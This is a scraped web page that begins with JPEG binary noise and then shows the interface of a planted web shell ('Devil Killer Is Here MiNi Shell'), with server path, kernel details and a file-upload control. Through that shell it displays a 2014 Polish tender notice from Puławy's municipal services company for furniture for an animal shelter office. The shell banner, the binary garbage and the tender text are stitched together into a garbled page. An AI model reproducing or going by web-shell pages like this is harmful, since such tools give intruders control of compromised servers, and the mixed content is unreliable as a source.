JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20141121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20141121/242253-N-2014.html

<p class="kh_header"><b>Puławy: Dostawa  i montaż mebli stanowiących wyposażenie budynku administracyjnego schroniska dla bezdomnych zwierząt zlokalizowanego przy ul. Komunalnej w Puławach</b><br>
<b>Numer ogłoszenia: 242253 - 2014; data zamieszczenia: 21.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Usług Komunalnych Sp z o.o , ul. Dęblińska 2, 24-100 Puławy, woj. lubelskie, tel. 081 8862018, 0-695-616-226.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zuk.pulawy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczona odpowiedzialnością - udział 100 % Gmina Miasto Puławy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  i montaż mebli stanowiących wyposażenie budynku administracyjnego schroniska dla bezdomnych zwierząt zlokalizowanego przy ul. Komunalnej w Puławach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest zakup, dostawa i montaż mebli stanowiących wyposażenie budynku administracyjnego schroniska dla bezdomnych zwierząt zlokalizowanego przy ul. Komunalnej w Puławach należącego do Zakładu Usług Komunalnych Sp. z o.o.  z siedzibą w Puławach przy ul. Dęblińskiej 2.
Szczegółowy opis przedmiotu zamówienia:

Wykaz mebli stanowiących wyposażenie pomieszczeń biurowych

Stół konferencyjny - 1 szt. o wymiarach dł. 200 cm/szer. min. 100cm/wys. min. 80 cm, blat - płyta wiórowa trzywarstwowa  pokryta obustronnie  melaminą, o grubości min.25 mm wzmocniona dodatkowo metalowymi podporami w spodniej części, blat oklejony obrzeżem PVC o grubości min. 2 mm w kolorze blatu, blat stołu mocowany do metalowej ramy, kolor buk bawaria, stelaż aluminiowy wyposażony w stopki w kształcie walca regulujące poziom stołu, gwarantujące stabilność oraz plastikowe odbojniki po spodniej części stelaża złożonego zapobiegające rysowaniu powierzchni, na której spoczywa stelaż, plastikowe dolne stopki nóg zapobiegające rysowaniu podłóg

Krzesło biurowe konferencyjne - 8 szt. o wymiarach dł. min. 55 cm / szer. min. 60 cm / wys. min. 90 cm, metalowa konstrukcja na bazie rury, malowana proszkowo, kolor aluminiowy, konstrukcja 4-nogi, oparcie i siedzisko w całości tapicerowane tkaniną z maskownicą plastikową na oparciu, tkanina o wysokiej odporności na ścieranie w kolorze czarnym, plastikowe dolne stopki nóg zapobiegające rysowaniu podłóg

Fotel biurowy - 2 szt. o wymiarach dł. min. 60 m / szer. min. 60 cm / wys. min. 110 cm z mechanizmem CPT, obrotowy, wyposażone w podstawę co najmniej pięciopodporową z kółkami jezdnymi,  oparcie i siedzisko w całości tapicerowane tkaniną z maskownicą plastikową na oparciu, z podłokietnikiem P20, tkanina o wysokiej odporności na ścieranie w kolorze czarnym

Biurko kształtowe zgięte z prawej z dwoma kontenerami - 1 szt. o wymiarach dł. min. 160 cm/szer. min. 110 cm/wys. min. 74 cm, blat płyta wiórowa melaminowana, kolor buk bawaria, grubość blatu min. 20 mm, krawędzie oklejone PCV 2 mm, stelaż o profilu min. 40 x 40 mm w kolorze aluminium, nogi łączone profilem poprzecznym, wzdłuż biurek poprowadzona belka wzmacniająca  łącząca nogi, otwór na przewody elektryczne,  1 kontener zamykany na zamek z kompletem kluczy (2 szt.) o wymiarach dł. min. 40 cm/gł. min. 70 cm/ wys. min. 65 max 70 cm z trzema szufladami , uchwyty szuflad wykonane ze stopu aluminiowego, podłużne w kolorze aluminium, 1 kontener o wymiarach: dł. Min 40 cm/gł. Min. 70 cm/wys. Min 65 max 70 cm, z 1 regulowaną półką, zamykana na zamek z kompletem kluczy ,plastikowe dolne stopki nóg zapobiegające rysowaniu podłóg

Biurko proste z kontenerem - 1 szt. o wymiarach dł. min. 120 cm/szer. min. 80 cm/wys. min. 74 cm, blat płyta wiórowa melaminowana, kolor buk bawaria, grubość blatu min. 20 mm, krawędzie oklejone PCV 2 mm, stelaż o profilu min. 40 x 40 mm w kolorze aluminium, nogi łączone profilem poprzecznym, wzdłuż biurek poprowadzona belka wzmacniająca  łącząca nogi, otwór na przewody elektryczne, kontener zamykany na zamek z kompletem kluczy (2 szt.) o wymiarach dł. min. 40 cm/gł. min. 70 cm/ wys. min. 65 max 70 cm z trzema szufladami, uchwyty szuflad wykonane ze stopu aluminiowego, podłużne w kolorze aluminium, plastikowe dolne stopki nóg zapobiegające rysowaniu podłóg


Szafy biurowe - wymagania ogólne
-szafa aktowa do biura przeznaczona do przechowywania dokumentów i segregatorów oraz innych akcesoriów związanych z wystawiennictwem, 5 poziomów (4 półki)
-konstrukcja z płyty melaminowej
-wieńce górne - płyta o grubości min. 25 mm
-fronty i korpusy - płyta o grubości min. 18 mm
-plecy - płyta o grubości min. 18 mm
-kolor korpusu i drzwiczek szafek buk bawaria
-stopki szafy z funkcją regulacji wysokości (+10 mm) umożliwiające wypoziomowanie mebla stojącego na nierównym podłożu
-listwa pod szafkami stojącymi o wysokości do 10 cm zakrywająca przestrzeń pod szafkami z płyty laminowanej w kolorze takim samym jak szafki z uszczelką pomiędzy listwą a posadzką
-wszystkie szafy zamykane na zamek (w komplecie 2 klucze)
-półki mocowane za pomocą złącz zabezpieczających przed przypadkowym wysunięciem dodatkowo zwiększającymi sztywność konstrukcji mebla
-uchwyty wykonane ze stopu aluminiowego, podłużne w kolorze aluminium


Szafka biurowa - 2 szt. o wymiarach dł. min. 80 cm/gł. min. 35 cm/wys. min. 110 wykonana z płyty wiórowej melaminowanej, kolor buk bawaria, blat o grubości min. 25 mm, okładzina PCV o gr. min. 2 mm, korpus i półki gr. min. 18 mm, okładzina z PCV gr. min. 1 mm, podzielona na 2 półki, zamykana na zamek z kompletem kluczy, plastikowe dolne stopki nóg zapobiegające rysowaniu podłóg

Szafka pod drukarkę - 1 szt. o wymiarach dł. min. 80 cm/gł. min. 35 cm/wys. min.  110, materiał płyta wiórowa melaminowana, kolor buk bawaria , blat o grubości min. 25 mm, okładzina PCV o gr. min. 2 mm, korpus i półki gr. min. 18 mm, okładzina z PCV gr. min. 1 mm, podzielona na 3 półki, w tym dwie z drzwiczkami, zamykana na zamek z kompletem kluczy

Szafka z szufladami - 2 szt. o wymiarach dł. min. 80 cm/gł. min. 45 cm/wys. min. 80 wykonana z płyty wiórowej melaminowanej, kolor biały, z czterema szufladami równej wielkości, uchwyty szuflad wykonane ze stopu aluminiowego, podłużne,  blat o grubości min. 25 mm, okładzina PCV o gr. min. 2 mm, korpus i półki gr. min. 18 mm, okładzina z PCV gr. min. 1 mm,  plastikowe dolne stopki nóg zapobiegające rysowaniu podłóg

Szafa biurowa aktowa wysoka - 5 szt. o wymiarach dł. min. 80 cm/gł. min. 35 cm/wys. min.  180, materiał płyta wiórowa, melaminowana, kolor buk bawaria , blat o grubości min. 25 mm, okładzina PCV o gr. min. 2 mm, korpus i półki gr. min. 18 mm, okładzina z PCV gr. min. 1 mm, podzielona na 4 półki z regulacją trzystopniową, w tym dwie z drzwiczkami, zamykana na zamek z kompletem kluczy

Szafa wysoka ubraniowa - 2 szt. o wymiarach dł. min. 80 cm/szer. min. 60 cm/wys. min. 180 dwudrzwiowa , materiał płyta wiórowa, melaminowana, kolor buk bawaria, blat o grubości min. 25 mm, okładzina PCV o gr. min. 2 mm, korpus i półki gr. min. 18 mm, okładzina z PCV gr. min. 1 mm, z jedną półką z regulacją trzystopniową u góry, poniżej zamontowany drążek na ubrania, zamykana na zamek z kompletem kluczy

Regały metalowe - 11 szt. o wymiarach wys. 213 cm/szer. 90cm, gł. 60cm, materiał stal ocynkowana, półka skonstruowana z płyty HDF o grubośći min 6 mm, nośność na pojedynczą półkę min 200 kg, nogi regały wykonane z kątownika o grubości min 40 mm, ilość półek 5 szt.,


Wykaz mebli stanowiących wyposażenie pomieszczeń socjalnych

Stół stołówkowy - 1 szt. o wymiarach dł min. 100 / szer. min. 100 / wys. min. 75 cm, blat z laminatu wysokociśnieniowego, kolor biały, stelaż metalowy oparty na nogach w kształcie odwróconej litery T, stelaż wyposażony w stopki do regulacji poziomu ~10mm, plastikowe dolne stopki nóg zapobiegające rysowaniu podłóg, kolor stelażu metalik, atest higieniczny

Stół stołówkowy - 1 szt. o wymiarach dł min. 200 / szer. min. 100 / wys. min. 80 cm, blat z laminatu wysokociśnieniowego, kolor biały, stelaż metalowy oparty na nogach w kształcie odwróconej litery T, stelaż wyposażony w stopki do regulacji poziomu ~10mm, plastikowe dolne stopki nóg zapobiegające rysowaniu podłóg, kolor stelażu metalik, atest higieniczny


Stół stołówkowy - 1 szt. o wymiarach dł min. 150 / szer. min. 100 / wys. min. 80 cm, blat z laminatu wysokociśnieniowego, kolor biały, stelaż metalowy oparty na nogach w kształcie odwróconej litery T, stelaż wyposażony w stopki do regulacji poziomu ~10mm, plastikowe dolne stopki nóg zapobiegające rysowaniu podłóg, kolor stelażu metalik, atest higieniczny

Stół stołówkowy - 5 szt. o wymiarach dł min. 70 / szer. min. 70 / wys. min. 73 cm, blat z laminatu wysokociśnieniowego, kolor biały, stelaż metalowy oparty na nogach w kształcie odwróconej litery T, stelaż wyposażony w stopki do regulacji poziomu ~10mm, plastikowe dolne stopki nóg zapobiegające rysowaniu podłóg, kolor stelażu metalik, atest higieniczny

Stół stołówkowy  - 1 szt. o wymiarach dł min. 110 / szer. min. 80 / wys. min. 73 cm, blat z laminatu wysokociśnieniowego, kolor biały, stelaż metalowy oparty na nogach w kształcie odwróconej litery T, stelaż wyposażony w stopki do regulacji poziomu ~10mm, plastikowe dolne stopki nóg zapobiegające rysowaniu podłóg, kolor stelażu metalik, atest higieniczny

Krzesło  - 22 szt. krzesło stołówkowe,  rama w kolorze aluminium, siedzisko i oparcie z profilowanej, giętej sklejki w kolorze niebieskim, głębokość siedziska min. 390 mm, wysokość siedziska min. 430 mm, plastikowe dolne stopki nóg zapobiegające rysowaniu podłóg

Szafa ubraniowa -5 szt. o wymiarach gł. min. 49 / szer. min. 30 / wys. min. 180 cm, szafa metalowa ubraniowa jednodrzwiowa ustawiana na stelażu metalowym, wyposażona w drążek na wieszaki ubraniowe, haczyk, drzwi muszą posiadać otwory wentylacyjne, które zapewniają prawidłową cyrkulację powietrza w szafie, drzwi szafki ubraniowej zamykane na zamek, do zamka w szafce ubraniowej muszą być dołączone dwa klucze, kolor do uzgodnienia z Zamawiającym

Szafa ubraniowa z ławką drewnianą -5  szt. o wymiarach gł. min. 49 / szer. min. 30 / wys. min. 180 cm, szafa metalowa ubraniowa jednodrzwiowa ustawiana na stelażu metalowym z ławką drewniana, wyposażona w drążek na wieszaki ubraniowe, haczyk, drzwi muszą posiadać otwory wentylacyjne, które zapewniają prawidłową cyrkulację powietrza w szafie, drzwi szafki ubraniowej zamykane na zamek, do zamka w szafce ubraniowej muszą być dołączone dwa klucze, kolor do uzgodnienia z Zamawiającym


Szafy kuchenne - wymagania ogólne
-fronty z płyty melaminowej, spełniającej normy klasy higieniczności E1 o grubości min. 18 mm, obrzeże PCV zaokrąglone o grubości min. 2 mm. lub z płyty MDF lakierowanej o gr. min. 18 mm.
-korpus z melaminowej płyty MDF o grubości min. 18 mm
-drzwiczki szafki amortyzowane
-kolor korpusu i drzwiczek szafek jasny do uzgodnienia z Zamawiającym
-szafki stojące na regulowanych nóżkach
-szafki wiszące na regulowanych zawieszkach
-blat kuchenny z płyty laminowanej o grubości min. 38 mm w kolorze do uzgodnienia z Zamawiającym
-plecy z płyty HDF min. 3,2 mm
-prowadnice z cichym domykaniem
-listwa pod szafkami stojącymi o wysokości do 10 cm zakrywająca przestrzeń pod szafkami z płyty laminowanej w kolorze takim samym jak szafki z uszczelką pomiędzy listwą a posadzką
-listwa przyścienna łącząca blat kuchenny ze ścianą o wymiarach min. 30x30 mm
-uchwyty metalowe podłużne do wszystkich drzwi szafek oraz szuflad -wzór do uzgodnienia z Zamawiającym


Meble kuchenne - zestaw 1 - blat roboczy z szafkami stojącymi o wymiarach ok. dł. 400 / gł. min. 50 / wys. 85, w tym 4 szafki o szerokości 80 cm i  1 szafka o szerokości 80 cm wyposażona w zlewozmywak dwukomorowy wykonany ze stali nierdzewnej wpuszczany, kompletny

Meble kuchenne - zestaw 2 - o dł. 236 cm, na zestaw składają się szafki stojące o wymiarach gł. min. 50 / wys. 85, w tym 3 szafki o szerokości 52 cm i 1 szafka o szerokości 80 cm wyposażona w zlewozmywak dwukomorowy wykonany ze stali nierdzewnej wpuszczany, kompletny

Meble kuchenne- zestaw 3 -  1 szafka o wymiarach gł. 60 cm.  / szer. 70 cm / wys.85 cm wyposażona w zlewozmywak jednokomorowy z ociekaczem,, 1 szafka  o wymiarach gł. 60 cm.  / szer. 30 cm / wys.85 cm

Poszczególne elementy przedmiotu lub ich składowe powinny posiadać wszelkie wymagane przez prawo zaświadczenia i certyfikaty (np. takie jak Certyfikat Unii Europejskiej CE) dopuszczające do obrotu i użytkowania zgodnie z wymogami Zamawiającego.

2.	Wykonawca musi zaoferować co najmniej 12 miesięczny okres gwarancji na  cały wykonany przedmiot zamówienia, liczony od daty odbioru całości zamówienia oraz musi się zobowiązać do nieodpłatnej naprawy ewentualnych usterek i wad w okresie gwarancyjnym.
Zamawiający zrównuje okres rękojmi z okresem udzielonej przez Wykonawcę gwarancji jakości, z zastrzeżeniem iż nie może on być krótszy od okresu wskazanego  powyżej.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.13.00.00-2, 39.15.00.00-8, 39.14.10.00-2, 39.13.40.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca wnosi wadium w wysokości 1.200,00 PLN. (słownie: jeden tysiąc dwieście złotych,00/100)

2.	Forma wadium:

1)	wadium musi obejmować cały okres związania ofertą i może być wniesione w jednej lub kilku następujących formach: 
a)	pieniądzu, 
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,  
d)	gwarancjach ubezpieczeniowych,   
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 2007 Nr 42, poz.275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).

2)	W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja musi być sporządzona zgodnie z obowiązującym prawem i zawierać następujące elementy:
a)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielającej gwarancji) oraz wskazanie ich siedzib, w przypadku Konsorcjum, zaleca się w treści gwarancji, jako Wykonawcę wskazać wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia,
b)	określenie wierzytelności, która ma być zabezpieczona gwarancją,
c)	kwotę gwarancji,
d)	termin ważności gwarancji,
e)	zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp lub pełnomocnictw i nie udowodnił, iż wynika to z przyczyn nieleżących po jego stronie.
f)	zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
-odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, lub
-nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, lub
-zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn   leżących po stronie Wykonawcy.
  
3) postanowienia pkt 2.2)  stosuje się odpowiednio do poręczeń określonych powyżej w pkt 2.1) lit. b) i e).
3.	Miejsce i sposób wniesienia wadium.

1)w przypadku wniesienia wadium w formie pieniężnej należy dokonać przelewu na rachunek bankowy Zamawiającego prowadzony przez:

Bank Zachodni WBK S.A. Oddział Puławy , nr konta bankowego: 95 1090 2688 0000 0001 2129 8568

2)	w przypadku składania wadium w innej postaci Wykonawca winien przedstawić ORYGINAŁ gwarancji/poręczenia (chyba, że z warunków gwarancji/poręczenia jednoznacznie wynika, że Zamawiający może zrealizować uprawnienia wynikające z gwarancji/poręczenia niezależnie od tego kto posiada oryginał gwarancji/poręczenia, czy dokument został zwrócony, zniszczony itd. - wówczas może być przedstawiona kopia potwierdzona za zgodność z oryginałem przez Wykonawcę). 

3)	Wykonawca może wymieniony dokument załączyć do składanej Oferty. Należy wówczas umieścić go w oddzielnej, zamkniętej kopercie z jednoznacznym określeniem zawartości - wadium  (tak by Zamawiający nie był zmuszony otwierać oferty przed upewnieniem się, że wadium zostało złożone przez Wykonawcę). W każdym razie wadium w tym również w formie, gwarancji lub poręczenia musi być wniesione przed upływem terminu składania ofert.

4.	Termin wniesienia wadium.

1) Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert.

2)	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust.1 ustawy Pzp, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.

5.	Zwrot wadium.

Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 ustawy Pzp.

6.	Utrata wadium.

1)	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:

a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.

2)	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Pzp, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 Pzp, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 Pzp, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 Pzp, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu opisu spełnienia tego warunku. Ocena nastąpi według formuły spełnia/nie spełnia na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu składanego na podstawie art. 44 ustawy Pzp (Załącznik nr 3 do IDW-SIWZ). Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu opisu spełnienia tego warunku. Ocena nastąpi według formuły spełnia/nie spełnia na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu składanego na podstawie art. 44 ustawy Pzp (Załącznik nr 3 do IDW-SIWZ). Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu opisu spełnienia tego warunku. Ocena nastąpi według formuły spełnia/nie spełnia na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu składanego na podstawie art. 44 ustawy Pzp (Załącznik nr 3 do IDW-SIWZ). Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu opisu spełnienia tego warunku. Ocena nastąpi według formuły spełnia/nie spełnia na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu składanego na podstawie art. 44 ustawy Pzp (Załącznik nr 3 do IDW-SIWZ). Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu opisu spełnienia tego warunku. Ocena nastąpi według formuły spełnia/nie spełnia na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu składanego na podstawie art. 44 ustawy Pzp (Załącznik nr 3 do IDW-SIWZ). Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie Wykonawcy z postępowania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

